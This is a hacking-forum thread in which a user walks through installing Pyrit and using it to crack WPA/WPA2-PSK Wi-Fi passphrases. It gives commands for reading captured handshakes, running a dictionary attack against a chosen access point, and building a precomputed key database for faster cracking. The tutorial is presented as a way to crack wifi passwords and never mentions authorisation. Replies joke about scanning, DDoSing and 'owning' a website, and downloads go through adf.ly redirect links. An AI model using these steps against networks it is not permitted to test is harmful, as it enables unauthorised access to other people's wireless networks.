Wireless network penetration: Using Pyrit (WPA/WPA2-PSK cracker) - Network Security

rx-

Hey, since i noticed an increase in wifi tutorials, i decided to write follow up too. Today i will show you how to use pyrit to precompute part of the WPA/WPA2-PSK authentication phrase, thus making the whole wifi cracking process easier and faster.
Note this tutorial is done for debian ( The only distro on my test server ) But since we are compiling from source, its not hard to apply it to other distro.

NOTE: I know you hate adf.ly, but cmon, you just wait a second and i get money so i can pay my online bills, its fair :)
Official Pyrit Page

What we will need:
Debian-based distro (the one that uses aptitude)

These libraries and tools:
Linux: zLib, OpenSSL, python, gcc, make, subversion (svn)
Mac OS: Xcode

Now, download the source for latest pyrit
http://adf.ly/2fbW (or use official page Downloads section when using wget/curl)

And if you have nVidia card, download this package:
http://adf.ly/2fbi
And if you have other compatible cards, download this one:
http://adf.ly/2fbu

Now, untar the pyrit, cd to it and run


pythin pyrit&#46;py build

If everything worked well, you can now proceed to install it


sudo python pyrit&#46;py install

Now, all you need to install is the OpenCL or nVidia CUDA package, here is part of the official pyrit wiki on how to install it.:

--------------------------------
... support for Nvidia-CUDA

Get yourself a copy of the CUDA-Toolkit from http://www.nvidia.com/object/cuda_get.html. You need to modify either $PATH and ldconfig or setup.py if you choose not to install the Toolkit into either '/usr/local/cuda' or '/opt/cuda' so CPyrit-CUDA's installation routine can find Nvidia's compiler 'nvcc'. You also need to have Nvidia's proprietary hardware-drivers installed in the way that fits your OS.

Switch to the directory holding CPyrit-CUDA's source-code and compile and install it just like you did with Pyrit:

cd cpyrit-cuda-0.3.0
python setup.py build
sudo python setup.py install
[/code]

This will list you GPUs:


pyrit list_cores

... support for OpenCL

OpenCL is currently supported by Nvidia (GeForce GPUs), AMD (ATI Radeon GPUs and SSE3-capable CPUs) and IBM (CELL B.E. CPUs). You can get a copy of the SDKs that are required to build CPyrit-OpenCL from the following sites (registration required):

Nvidia OpenCL SDK/Toolkit
ATI Stream SDKPlease see the drivers' installation instruction for how to get everything up and running. The SDKs usually include simple demos and examples. First try to get those demos working and you'll most probably have no problems installing CPyrit-OpenCL.

Switch to the directory holding CPyrit-OpenCL's source-code and compile and install it just like you did with Pyrit:


cd cpyrit-opencl-0&#46;3&#46;0
python setup&#46;py build
sudo python setup&#46;py install

This will list you GPUs:


pyrit list_cores

--------------------------------

Great, so now you have pyrit working! I can show you how to work with it.

Once again, cd to the pyrit source directory, and then to the test directory, where you should see three files:


dict&#46;gz - wordlist
wpa2psk-linksys&#46;dump&#46;gz - dump of a WPA2-PSK handshake
wpapsk-linksys&#46;dump&#46;gz - dump a WPA-PSK handshake

Note that the two dumps are provided with the package, if you want your own, pyrit will understand any logfile in the pcap format.

To analyze dump file (assuming we will use the provided files)


pyrit -r wpapsk-linksys&#46;dump&#46;gz

What will you see is a list of AccessPoints and clients, their MAC addresses, total number of APs and total number of packets in the dump file. Using this, you can decide what client-AP communication you want to attack. Below is an example of how can you easily crack the password for the wifi:


pyrit -r wpapsk-linksys&#46;dump&#46;gz -i dict&#46;gz -b 00&#58;0b&#58;86&#58;c2&#58;a4&#58;85 attack_passthrough

This basically uses dumpfile wpapsk-linksys.dump.gz and dictionary file dict.gz to attack a AccessPoint 00:0b:86:c2:a4:85 and try to find out the password in words from dictionary.

Since cracking is very expensive on CPU time, we will use the pyrits database, which in time can potentionally grow up to few millions of entries, using file DB or MySQL db.


pyrit eval

This will give you basic image of how big your database is. For now on, it will be empty.

To input passwords in your database, use this:


pyrit -i dict&#46;gz import_passwords

This will import all passwords from dict.gz to your DB, also removing duplicates and sorting out passwords that cant be used within WPA/WPA2-PSK secured networks.


pyrit -e linksys create_essid

Will create essid called linksys and prepare it for batch processing, which is done like this:


pyrit batch

Pyrit will now process the db, computing key for each essid:password combination and store it for later use.

For attacking a essid using your database, use this:


pyrit -r wpapsk-linksys&#46;dump&#46;gz attack_db

While lated, ta-daa! Your password is cracked! I hope you liked this tut, post comments and feedback please!

nice2kn0w

good one :) thanks for that

Xin

Nice, yeah adf.ly is fine, (as long as you spend it on iexploit elite ;) ) haha, but yeah adf is fine, its sharecash which gets on my nerves

rx-

said:

Nice, yeah adf.ly is fine, (as long as you spend it on iexploit elite ;) ) haha, but yeah adf is fine, its sharecash which gets on my nerves

Yeah, sharecrap is shit, cuz no offers for my country :) adf.ly just lets you wait a little, thats cool imo :) I wanna spend the money for vps so we can have separate irc server, better challenges ETC... :)

h4ckingURLife

Nice tutorial. Thanks for the post.

said:

Nice, yeah adf.ly is fine, (as long as you spend it on iexploit elite ;) ) haha, but yeah adf is fine, its sharecash which gets on my nerves

Yeah, lets scan shitcash for vuln ports and hack that shit. j/k
We can just ddos it. :D

rx-

lets own it, way better then to ddos it :)

Howdy, Stranger!

Top Posters

Who's Online (1)